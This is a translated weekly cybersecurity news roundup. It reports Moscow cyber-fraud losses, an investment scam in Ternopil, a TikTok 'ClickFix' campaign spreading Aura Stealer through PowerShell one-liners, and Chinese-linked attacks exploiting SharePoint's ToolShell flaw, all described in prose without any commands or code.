«Скандалы в TikTok: как кибермошенники используют соцсети для кражи миллиардов» Scandals on TikTok: How Cybercriminals Use Social Media to Steal Billions

We have compiled the most significant cybersecurity news from the past week.

In the first half of 2025, cybercrime inflicted damages amounting to 34 billion rubles in Moscow. Colonel Anton Kononenko, head of the Department for Combating the Illegal Use of Information and Communication Technologies within the Ministry of Internal Affairs of Russia, shared this information in an interview with Interfax.

“Crimes are now being committed for amounts starting at one million rubles, with minor cases virtually nonexistent. Compared to previous years, the financial losses due to cyber fraud in the capital are on the rise,” Kononenko stated.

According to law enforcement data, cybercriminals set a record in the spring by stealing 450 million rubles.

Kononenko noted that over the last three years, the scale of losses has been increasing. Previously, most theft-related investigations involved amounts up to 50,000 rubles; now, around 80% of identified crimes fall into the categories of serious (with damages of 250,000 rubles) and especially serious offenses.

A 64-year-old resident of Ternopil became a victim of fraud, losing approximately 1 million hryvnias. This was reported by the press service of the Ternopil District Police Department.

According to law enforcement, the victim saw an advertisement on social media about investment courses promising income. He followed the link and contacted an individual claiming to be a broker-analyst.

After registering on the site, the pensioner began transferring funds from his electronic wallet to the specified account. When the total reached $28,100, the «broker» ceased communication, and access to the platform was blocked.

On October 17, ISC Handler analyst Xavier Mertens noted an ongoing campaign utilizing TikTok videos to facilitate hacking attacks.

Malware aimed at data theft is disguised as free guides for activating popular software like Windows, Spotify, and Netflix.

The creators of these videos employ a ClickFix social engineering technique, where the perpetrators present seemingly legitimate “solutions” or instructions to the victim.

In reality, they compel the individual to execute malicious PowerShell commands or other scripts that infect the computer.

Each video showcases a short one-liner command and encourages the viewer to run it as an administrator in PowerShell.

Once launched, the software connects to a remote site and downloads another script, which retrieves and installs two executable files from Cloudflare Pages. The first is a variant of Aura Stealer — malware designed to exfiltrate:

All data gathered is sent to the attackers, providing them access to the victim’s accounts.

Mertens added that an additional file, source.exe, is downloaded, utilizing the built-in Visual C# Compiler to self-assemble code. This code is then executed in memory. The purpose of the second module remains unclear at this time.

Hackers linked to China have exploited the ToolShell vulnerability in Microsoft SharePoint to conduct attacks against government agencies, universities, telecommunications providers, and financial institutions. This is detailed in a report by Symantec.

The vulnerability affects locally hosted SharePoint servers. It became known in July following large-scale attacks by Chinese hackers. The malware can be exploited remotely without authentication to execute code and gain full access to the file system.

During this campaign, the attackers deployed malware typically associated with the Chinese hacker group Salt Typhoon.

According to Symantec, ToolShell was used to compromise various organizations in the Middle East, South America, the United States, and Africa. The attacks impacted:

Interestingly, the attack was executed using legitimate executables from Trend Micro and BitDefender. In South America, the perpetrators used a file that closely resembled the name of Symantec.

Researchers noted that the publicly available tools employed in the attacks included Microsoft’s certutil, the GoGo Scanner, and Revsocks, a utility facilitating data exfiltration through a remote server.